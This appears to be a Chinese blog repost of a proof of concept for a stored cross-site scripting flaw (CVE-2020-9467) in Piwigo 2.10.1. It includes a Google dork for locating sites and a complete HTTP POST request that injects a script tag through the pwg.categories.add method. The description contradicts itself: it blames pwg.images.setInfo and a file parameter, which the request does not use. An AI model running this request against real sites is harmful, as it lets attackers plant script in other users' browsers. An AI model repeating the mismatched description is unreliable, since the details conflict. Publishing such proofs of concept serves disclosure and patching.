Piwigo 2.10.1-跨站点脚本—Hack之路

Piwigo 2.10.1-跨站点脚本

#POC by:铱

#软件主页:http://www.piwigo.org

#版本:2.10.1

#测试对象:Linux和Windows

#类别:webapps

#谷歌呆子:intext:“由Piwigo提供动力”

#CVE:CVE-2020-9467

########说明########

Piwigo 2.10.1通过文件参数将XSS存储在/ws.php文件请求

因为pwg.images.setInfo功能。

##概念证明########
*Request*
POST /piwigo/ws.php?format=json HTTP/1.1
Host: [victim]
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:80.0) Gecko/20100101
Firefox/80.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 79
Origin: http://[victim]
Connection: close
Referer: http://[victim]/piwigo/admin.php?page=photos_add&section=direct
Cookie: pwg_id=08tksticrdkctrvj3gufqqbsnh
method=pwg.categories.add&parent=1&name=%3Cscript%3Ealert('XSS')%3C%2Fscript%3E

网站地址:https://www.hackzl.cn;发布者:hack之路,转转请注明出处:https://www.hackzl.cn/index.php/2020/09/21/piwigo-2-10-1-%e8%b7%a8%e7%ab%99%e7%82%b9%e8%84%9a%e6%9c%ac-hack%e4%b9%8b%e8%b7%af/

发表评论

邮箱地址不会被公开。 必填项已用*标注